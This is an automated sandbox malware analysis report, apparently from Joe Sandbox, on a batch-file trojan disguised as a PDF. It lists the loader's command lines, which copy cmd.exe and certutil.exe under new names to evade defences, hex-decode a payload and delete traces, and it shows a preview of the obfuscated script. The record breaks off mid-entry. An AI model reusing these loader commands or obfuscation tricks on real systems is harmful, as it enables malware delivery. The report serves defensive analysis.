Source: C:\Users\Public\alpha.exeCode function: 3_2_00007FF755CC63FC GetCurrentThreadId,IsDebuggerPresent,OutputDebugStringW,3_2_00007FF755CC63FC
Source: C:\Users\Public\alpha.exeCode function: 3_2_00007FF755CB823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose,3_2_00007FF755CB823C
Source: C:\Users\Public\alpha.exeCode function: 3_2_00007FF755CB93B0 SetUnhandledExceptionFilter,3_2_00007FF755CB93B0
Source: C:\Users\Public\alpha.exeCode function: 3_2_00007FF755CB8FA4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_00007FF755CB8FA4
Source: C:\Users\Public\alpha.exeCode function: 5_2_00007FF755CB93B0 SetUnhandledExceptionFilter,5_2_00007FF755CB93B0
Source: C:\Users\Public\alpha.exeCode function: 5_2_00007FF755CB8FA4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,5_2_00007FF755CB8FA4
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C5564E18 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,6_2_00007FF6C5564E18
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C55653E0 SetUnhandledExceptionFilter,6_2_00007FF6C55653E0
Source: C:\Users\Public\alpha.exeCode function: 9_2_00007FF755CB93B0 SetUnhandledExceptionFilter,9_2_00007FF755CB93B0
Source: C:\Users\Public\alpha.exeCode function: 9_2_00007FF755CB8FA4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,9_2_00007FF755CB8FA4
Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF755CB93B0 SetUnhandledExceptionFilter,10_2_00007FF755CB93B0
Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF755CB8FA4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,10_2_00007FF755CB8FA4

HIPS / PFW / Operating System Protection Evasion

barindex
Drops or copies certutil.exe with a different name (likely to bypass HIPS)
Source: C:\Windows\System32\extrac32.exeFile created: C:\Users\Public\kn.exeJump to dropped file
Drops or copies cmd.exe with a different name (likely to bypass HIPS)
Source: C:\Windows\System32\extrac32.exeFile created: C:\Users\Public\alpha.exeJump to dropped file
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C5517024 GetModuleHandleW,GetProcAddress,#356,#357,CloseHandle,LocalFree,LocalFree,LocalFree,ImpersonateLoggedOnUser,#356,EqualSid,#357,LogonUserExW,GetLastError,ImpersonateLoggedOnUser,#356,#359,RevertToSelf,#356,6_2_00007FF6C5517024
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\extrac32.exe C:\\Windows\\System32\\extrac32 /C /Y C:\\Windows\\System32\\cmd.exe "C:\\Users\\Public\\alpha.exe" Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exeJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\1x40 CONTAINER.PDF-.bat" "C:\\Users\\Public\\spoolsv.MPEG" 9 Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\spoolsv.MPEG" "C:\\Users\\Public\\Libraries\\spoolsv.COM" 12 Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\kn.exe" / A / F / Q / S Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\spoolsv.MPEG" / A / F / Q / S Jump to behavior
Source: C:\Users\Public\alpha.exeProcess created: C:\Windows\System32\extrac32.exe extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exeJump to behavior
Source: C:\Users\Public\alpha.exeProcess created: C:\Users\Public\kn.exe C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\1x40 CONTAINER.PDF-.bat" "C:\\Users\\Public\\spoolsv.MPEG" 9 Jump to behavior
Source: C:\Users\Public\alpha.exeProcess created: C:\Users\Public\kn.exe C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\spoolsv.MPEG" "C:\\Users\\Public\\Libraries\\spoolsv.COM" 12 Jump to behavior
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C5504AF4 GetSecurityDescriptorDacl,GetLastError,SetEntriesInAclW,SetSecurityDescriptorDacl,GetLastError,#357,#357,LocalFree,LocalFree,LocalFree,6_2_00007FF6C5504AF4
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C5514E98 AllocateAndInitializeSid,GetLastError,#357,GetCurrentThread,GetLastError,OpenThreadToken,GetLastError,GetCurrentProcess,GetLastError,OpenProcessToken,GetLastError,DuplicateToken,GetLastError,CheckTokenMembership,GetLastError,CloseHandle,CloseHandle,FreeSid,6_2_00007FF6C5514E98
Source: C:\Users\Public\alpha.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,setlocale,3_2_00007FF755CB51EC
Source: C:\Users\Public\alpha.exeCode function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetDateFormatW,GetDateFormatW,realloc,GetDateFormatW,memmove,GetLastError,realloc,3_2_00007FF755CA6EE4
Source: C:\Users\Public\alpha.exeCode function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetTimeFormatW,3_2_00007FF755CB3140
Source: C:\Users\Public\alpha.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,setlocale,5_2_00007FF755CB51EC
Source: C:\Users\Public\alpha.exeCode function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetDateFormatW,GetDateFormatW,realloc,GetDateFormatW,memmove,GetLastError,realloc,5_2_00007FF755CA6EE4
Source: C:\Users\Public\alpha.exeCode function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetTimeFormatW,5_2_00007FF755CB3140
Source: C:\Users\Public\kn.exeCode function: LoadLibraryExW,SearchPathW,FindResourceExW,GetUserDefaultUILanguage,GetLocaleInfoW,wcsncmp,GetSystemDefaultUILanguage,FreeLibrary,FreeLibrary,LoadLibraryExW,FreeLibrary,6_2_00007FF6C5563800
Source: C:\Users\Public\alpha.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,setlocale,9_2_00007FF755CB51EC
Source: C:\Users\Public\alpha.exeCode function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetDateFormatW,GetDateFormatW,realloc,GetDateFormatW,memmove,GetLastError,realloc,9_2_00007FF755CA6EE4
Source: C:\Users\Public\alpha.exeCode function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetTimeFormatW,9_2_00007FF755CB3140
Source: C:\Users\Public\alpha.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,setlocale,10_2_00007FF755CB51EC
Source: C:\Users\Public\alpha.exeCode function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetDateFormatW,GetDateFormatW,realloc,GetDateFormatW,memmove,GetLastError,realloc,10_2_00007FF755CA6EE4
Source: C:\Users\Public\alpha.exeCode function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetTimeFormatW,10_2_00007FF755CB3140
Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\Public\alpha.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\Public\alpha.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\Public\alpha.exeCode function: 3_2_00007FF755CA6EE4 GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetDateFormatW,GetDateFormatW,realloc,GetDateFormatW,memmove,GetLastError,realloc,3_2_00007FF755CA6EE4
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C55470F4 LookupAccountNameW,GetLastError,GetLastError,LocalAlloc,LocalAlloc,LookupAccountNameW,GetLastError,ConvertSidToStringSidW,GetLastError,#357,LocalFree,LocalFree,LocalFree,6_2_00007FF6C55470F4
Source: C:\Users\Public\alpha.exeCode function: 3_2_00007FF755CA586C GetVersion,3_2_00007FF755CA586C
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C548E568 #357,LookupAccountSidW,GetLastError,#357,DsGetDcNameW,DsBindW,DsGetDomainControllerInfoW,DsGetDomainControllerInfoW,#357,DsUnBindW,NetApiBufferFree,LocalFree,6_2_00007FF6C548E568
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C547227C DsGetDcNameW,#357,DsBindW,DsCrackNamesW,#357,#357,#357,#357,#357,LocalAlloc,#359,DsUnBindW,NetApiBufferFree,DsFreeNameResultW,LocalFree,LocalFree,6_2_00007FF6C547227C
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C5495648 #357,#357,DsGetSiteNameW,#359,LocalAlloc,LocalAlloc,GetTickCount,DsGetSiteNameW,GetTickCount,#207,LocalFree,#359,NetApiBufferFree,#357,#357,#207,LocalFree,#359,#359,#359,LocalFree,NetApiBufferFree,NetApiBufferFree,LocalFree,LocalFree,#357,DsUnBindW,6_2_00007FF6C5495648
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C54754A0 wcschr,NetApiBufferFree,DsFreeNameResultW,#13,LocalFree,DsGetDcNameW,#359,#224,#224,DsBindW,#357,DsCrackNamesW,#357,#145,#359,#359,#14,#359,#73,#359,#208,#26,#127,LocalFree,#140,#359,#224,#167,#27,#357,#357,#41,NetApiBufferFree,DsUnBindW,DsFreeNameResultW,#13,LocalFree,6_2_00007FF6C54754A0

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity Information1
Scripting		2
Valid Accounts		Windows Management Instrumentation2
Valid Accounts		2
Valid Accounts		111
Masquerading		OS Credential Dumping1
System Time Discovery		Remote Services11
Archive Collected Data		2
Encrypted Channel		Exfiltration Over Other Network Medium1
Data Encrypted for Impact
CredentialsDomainsDefault AccountsScheduled Task/Job1
Scripting		21
Access Token Manipulation		2
Valid Accounts		LSASS Memory2
Security Software Discovery		Remote Desktop ProtocolData from Removable MediaJunk DataExfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAt1
DLL Side-Loading		11
Process Injection		2
Disable or Modify Tools		Security Account Manager1
Account Discovery		SMB/Windows Admin SharesData from Network Shared DriveSteganographyAutomated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
DLL Side-Loading		21
Access Token Manipulation		NTDS1
System Owner/User Discovery		Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script11
Process Injection		LSA Secrets1
File and Directory Discovery		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
Deobfuscate/Decode Files or Information		Cached Domain Credentials25
System Information Discovery		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
Obfuscated Files or Information		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
Install Root Certificate		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
Timestomp		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron1
DLL Side-Loading		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 1569543 Sample: 1x40 CONTAINER.PDF-.bat Startdate: 05/12/2024 Architecture: WINDOWS Score: 84 31 Malicious sample detected (through community Yara rule) 2->31 33 Multi AV Scanner detection for submitted file 2->33 35 Found large BAT file 2->35 37 2 other signatures 2->37 7 cmd.exe 1 2->7         started        process3 process4 9 extrac32.exe 1 7->9         started        13 alpha.exe 1 7->13         started        15 alpha.exe 1 7->15         started        17 4 other processes 7->17 file5 29 C:\Users\Public\alpha.exe, PE32+ 9->29 dropped 41 Drops PE files to the user root directory 9->41 43 Drops or copies certutil.exe with a different name (likely to bypass HIPS) 9->43 45 Drops or copies cmd.exe with a different name (likely to bypass HIPS) 9->45 19 kn.exe 3 1 13->19         started        22 extrac32.exe 1 15->22         started        25 kn.exe 1 17->25         started        signatures6 process7 file8 39 Registers a new ROOT certificate 19->39 27 C:\Users\Public\kn.exe, PE32+ 22->27 dropped signatures9

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
1x40 CONTAINER.PDF-.bat27%ReversingLabsScript-BAT.Trojan.Remcos

Dropped Files

SourceDetectionScannerLabelLink
C:\Users\Public\alpha.exe0%ReversingLabs
C:\Users\Public\kn.exe0%ReversingLabs

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

No Antivirus matches

Domains and IPs

Contacted Domains

No contacted domains info

URLs from Memory and Binaries

NameSourceMaliciousAntivirus DetectionReputation
https://%ws/%ws_%ws_%ws/service.svc/%wsADPolicyProviderSCEPkn.exe, 00000006.00000000.1666357084.00007FF6C556E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000006.00000002.1669885259.00007FF6C556E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000008.00000002.1673228008.00007FF6C556E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000008.00000000.1671803447.00007FF6C556E000.00000002.00000001.01000000.00000005.sdmp, kn.exe.4.drfalse
    		high
    https://enterpriseregistration.windows.net/EnrollmentServer/DeviceEnrollmentWebService.svckn.exefalse
      		high
      https://login.microsoftonline.com/%s/oauth2/authorizekn.exefalse
        		high
        https://login.microsoftonline.com/%s/oauth2/tokenkn.exefalse
          		high
          https://login.microsoftonline.com/%s/oauth2/authorizeJoinStatusStorage::SetDefaultDiscoveryMetadatahkn.exe, 00000006.00000000.1666357084.00007FF6C556E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000006.00000002.1669885259.00007FF6C556E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000008.00000002.1673228008.00007FF6C556E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000008.00000000.1671803447.00007FF6C556E000.00000002.00000001.01000000.00000005.sdmp, kn.exe.4.drfalse
            		high
            https://%ws/%ws_%ws_%ws/service.svc/%wskn.exefalse
              		high
              https://enterpriseregistration.windows.net/EnrollmentServer/device/kn.exefalse
                		high
                https://enterpriseregistration.windows.net/EnrollmentServer/key/kn.exefalse
                  		high

                  World Map of Contacted IPs

                  No contacted IP infos

                  General Information

                  Joe Sandbox version:41.0.0 Charoite
                  Analysis ID:1569543
                  Start date and time:2024-12-05 20:30:48 +01:00
                  Joe Sandbox product:CloudBasic
                  Overall analysis duration:0h 4m 8s
                  Hypervisor based Inspection enabled:false
                  Report type:full
                  Cookbook file name:default.jbs
                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                  Number of analysed new started processes analysed:11
                  Number of new started drivers analysed:0
                  Number of existing processes analysed:0
                  Number of existing drivers analysed:0
                  Number of injected processes analysed:0
                  Technologies:
                  • HCA enabled
                  • EGA enabled
                  • AMSI enabled
                  Analysis Mode:default
                  Analysis stop reason:Timeout
                  Sample name:1x40 CONTAINER.PDF-.bat
                  Detection:MAL
                  Classification:mal84.bank.evad.winBAT@20/8@0/0
                  EGA Information:
                  • Successful, ratio: 100%
                  HCA Information:
                  • Successful, ratio: 100%
                  • Number of executed functions: 60
                  • Number of non-executed functions: 206
                  Cookbook Comments:
                  • Found application associated with file extension: .bat
                  • Stop behavior analysis, all processes terminated

                  Warnings

                  • Not all processes where analyzed, report is missing behavior information
                  • Report size exceeded maximum capacity and may have missing disassembly code.
                  • VT rate limit hit for: 1x40 CONTAINER.PDF-.bat

                  Simulations

                  Behavior and APIs

                  No simulations

                  Joe Sandbox View / Context

                  IPs

                  No context

                  Domains

                  No context

                  ASNs

                  No context

                  JA3 Fingerprints

                  No context

                  Dropped Files

                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  C:\Users\Public\alpha.exesaw.batGet hashmaliciousRemcos, DBatLoaderBrowse
                    A1 igazol#U00e1s.cmdGet hashmaliciousDBatLoader, FormBookBrowse
                      Documentazione_Doganale_richieste_di_copia.cmdGet hashmaliciousDBatLoaderBrowse
                        78326473_PDF.cmdGet hashmaliciousDBatLoaderBrowse
                          iuhmzvlH.cmdGet hashmaliciousUnknownBrowse
                            USD470900_COPY_800BLHSBC882001.PDF.batGet hashmaliciousRemcos, DBatLoaderBrowse
                              Ziraat_Bankasi_Swift_Mesaji_BXB04958T.cmdGet hashmaliciousAgentTesla, DBatLoader, PureLog StealerBrowse
                                Ziraat_Bankasi_Swift_Mesaji_DXB04958T.cmdGet hashmaliciousAgentTesla, DBatLoader, PureLog StealerBrowse
                                  #U00c1raj#U00e1nlat k#U00e9r#U00e9s 12#U00b711#U00b72024#U00b7Pdf.cmdGet hashmaliciousUnknownBrowse

                                    Created / dropped Files

                                    C:\Users\Public\alpha.exe

                                    Download File
                                    Process:C:\Windows\System32\extrac32.exe
                                    File Type:PE32+ executable (console) x86-64, for MS Windows
                                    Category:modified
                                    Size (bytes):289792
                                    Entropy (8bit):6.135598950357573
                                    Encrypted:false
                                    SSDEEP:6144:k4WA1B9BxDfQWKORSqY4zOcmpdlc3gJdmtolSm:H1BhkWvSqY4zvmjOwJIT
                                    MD5:8A2122E8162DBEF04694B9C3E0B6CDEE
                                    SHA1:F1EFB0FDDC156E4C61C5F78A54700E4E7984D55D
                                    SHA-256:B99D61D874728EDC0918CA0EB10EAB93D381E7367E377406E65963366C874450
                                    SHA-512:99E784141193275D4364BA1B8762B07CC150CA3CB7E9AA1D4386BA1FA87E073D0500E61572F8D1B071F2FAA2A51BB123E12D9D07054B59A1A2FD768AD9F24397
                                    Malicious:false
                                    Antivirus:
                                    • Antivirus: ReversingLabs, Detection: 0%
                                    Joe Sandbox View:
                                    • Filename: saw.bat, Detection: malicious, Browse
                                    • Filename: A1 igazol#U00e1s.cmd, Detection: malicious, Browse
                                    • Filename: Documentazione_Doganale_richieste_di_copia.cmd, Detection: malicious, Browse
                                    • Filename: 78326473_PDF.cmd, Detection: malicious, Browse
                                    • Filename: iuhmzvlH.cmd, Detection: malicious, Browse
                                    • Filename: USD470900_COPY_800BLHSBC882001.PDF.bat, Detection: malicious, Browse
                                    • Filename: Ziraat_Bankasi_Swift_Mesaji_BXB04958T.cmd, Detection: malicious, Browse
                                    • Filename: Ziraat_Bankasi_Swift_Mesaji_DXB04958T.cmd, Detection: malicious, Browse
                                    • Filename: #U00c1raj#U00e1nlat k#U00e9r#U00e9s 12#U00b711#U00b72024#U00b7Pdf.cmd, Detection: malicious, Browse
                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........OH...&...&...&..V...&..E%...&..E"...&...'../&..E'...&..E#...&..E+...&..E....&..E$...&.Rich..&.................PE..d...S.............".................P..........@.............................p............`.................................................(...................4#...........`......`Z..T............................,...............4...... ........................text............................... ..`.rdata..<.... ......................@..@.data...P...........................@....pdata..4#.......$..................@..@.didat..............................@....rsrc...............................@..@.reloc.......`.......h..............@..B........................................................................................................................................................................................................................

                                    C:\Users\Public\kn.exe

                                    Download File
                                    Process:C:\Windows\System32\extrac32.exe
                                    File Type:PE32+ executable (console) x86-64, for MS Windows
                                    Category:modified
                                    Size (bytes):1651712
                                    Entropy (8bit):6.144018815244304
                                    Encrypted:false
                                    SSDEEP:24576:MeiElH5YZ5cv6r3HiaZQ8p4XGwiJDgN7MaikGLIsWWi4pT/Y/7hsyDAP760MKR:Me3lZYUvmSu4XTckYD0sWWiwT/MhTzK
                                    MD5:F17616EC0522FC5633151F7CAA278CAA
                                    SHA1:79890525360928A674D6AEF11F4EDE31143EEC0D
                                    SHA-256:D252235AA420B91C38BFEEC4F1C3F3434BC853D04635453648B26B2947352889
                                    SHA-512:3ED65172159CD1BCC96B5A0B41D3332DE33A631A167CE8EE8FC43F519BB3E2383A58737A41D25AA694513A68C639F0563A395CD18063975136DE1988094E9EF7
                                    Malicious:false
                                    Antivirus:
                                    • Antivirus: ReversingLabs, Detection: 0%
                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......u}{h1..;1..;1..;..;0..;%w.:2..;%w.:*..;%w.:!..;%w.:...;1..;...;%w.:...;%w.;0..;%w.:0..;Rich1..;................PE..d...+. H.........."..................L.........@....................................q.....`.......... ......................................@Q.......`..@........x..............l'..p5..T...........................`(..............x)......XC.......................text............................... ..`.rdata..T...........................@..@.data....&..........................@....pdata...x.......z...|..............@..@.didat.......P......................@....rsrc...@....`......................@..@.reloc..l'.......(..................@..B........................................................................................................................................................................................................................

                                    \Device\Null

                                    Download File
                                    Process:C:\Users\Public\alpha.exe
                                    File Type:ASCII text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):104
                                    Entropy (8bit):4.403504238247217
                                    Encrypted:false
                                    SSDEEP:3:HnRthLK5aTRECUAdROGCOwXWnjTRrGIAOFZRMQcv:HRoAREYTOGjHVF+
                                    MD5:E14D0D771A7FEB9D78EA3DCA9197BA2A
                                    SHA1:48E363AAD601D9073D803AA9D224BF9A7FC39119
                                    SHA-256:0C13A861207709C246F13ACE164529F31F2F91CF14BD37795192D5B37E965BE6
                                    SHA-512:3460F93FEA31D68E49B1B82EDCB8A2A9FCCE34910DD04DEE7BD7503DB8DAB6D1D5C73CBD2C15156DCB601512AD68DE6FEF7DCB8F8A72A8A0747248B378C17CF9
                                    Malicious:false
                                    Preview:The system cannot find message text for message number 0x400023a1 in the message file for Application...

                                    Static File Info

                                    General

                                    File type:Unicode text, UTF-16, little-endian text, with very long lines (32767), with no line terminators
                                    Entropy (8bit):4.969115739297388
                                    TrID:
                                    • Text - UTF-16 (LE) encoded (2002/1) 66.67%
                                    • MP3 audio (1001/1) 33.33%
                                    File name:1x40 CONTAINER.PDF-.bat
                                    File size:3'675'586 bytes
                                    MD5:91f00c06e8cc61fe9239eefdb0dd0c03
                                    SHA1:d37a062f52f67920062bc5c6bf67a846ac431e9e
                                    SHA256:c155d1fac78a328deb5fc50e3a779cb1210abdbb22fea06dfcdeea93e5d1fa7e
                                    SHA512:fd8f0a8bedac0ca36d89e2ecbdf2ac445ff1ee4e0a298791b75bcfdf87d21dc5a71ea757b0ee4aeb82f29f55f839eb313f1fe15760e9612b80dbf5b4d326ca0a
                                    SSDEEP:49152:ZbnfQw2CN7WB0bIUvBafMtLz4Grc+UcqodC2W:E
                                    TLSH:C4064E9739BF1F87170E366B7F4BAB444A9ECC240A83DB8C42D611D8580B27F69F0959
                                    File Content Preview:..&@cls&@set "_..=Rfoc 7NDyWUq13FOX20QjaLIlwkg8VM9uiASHrCtTnKEedGYpZsP6B4zm@v5hJxb"..%_..:~57,1%%_..:~50,1%%_..:~44,1%%_..:~39,1%%_..:~4,1%"_....=%_..:~46,1%%_..:~15,1%%_..:~49,1%%_..:~0,1%%_..:~37,1%%_..:~42,1%%_..:~23,1%%_..:~40,1%%_..:~19,1%%_..:~60,1%

                                    File Icon

                                    Icon Hash:9686878b929a9886

                                    Network Behavior

                                    No network behavior found

                                    Statistics

                                    CPU Usage

                                    Click to jump to process

                                    Memory Usage

                                    Click to jump to process

                                    High Level Behavior Distribution

                                    Click to dive into process behavior distribution

                                    Behavior

                                    Click to jump to process

                                    System Behavior

                                    General

                                    Target ID:0
                                    Start time:14:31:37
                                    Start date:05/12/2024
                                    Path:C:\Windows\System32\cmd.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\1x40 CONTAINER.PDF-.bat" "
                                    Imagebase:0x7ff6f9610000
                                    File size:289'792 bytes
                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    General

                                    Target ID:1
                                    Start time:14:31:37
                                    Start date:05/12/2024
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff7699e0000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    General

                                    Target ID:2
                                    Start time:14:31:37
                                    Start date:05/12/2024
                                    Path:C:\Windows\System32\extrac32.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\\Windows\\System32\\extrac32 /C /Y C:\\Windows\\System32\\cmd.exe "C:\\Users\\Public\\alpha.exe"
                                    Imagebase:0x7ff619ee0000
                                    File size:35'328 bytes
                                    MD5 hash:41330D97BF17D07CD4308264F3032547
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:moderate
                                    Has exited:true

                                    General

                                    Target ID:3
                                    Start time:14:31:38
                                    Start date:05/12/2024
                                    Path:C:\Users\Public\alpha.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
                                    Imagebase:0x7ff755ca0000
                                    File size:289'792 bytes
                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Antivirus matches:
                                    • Detection: 0%, ReversingLabs
                                    Reputation:high
                                    Has exited:true

                                    General

                                    Target ID:4
                                    Start time:14:31:38
                                    Start date:05/12/2024
                                    Path:C:\Windows\System32\extrac32.exe
                                    Wow64 process (32bit):false
                                    Commandline:extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
                                    Imagebase:0x7ff619ee0000
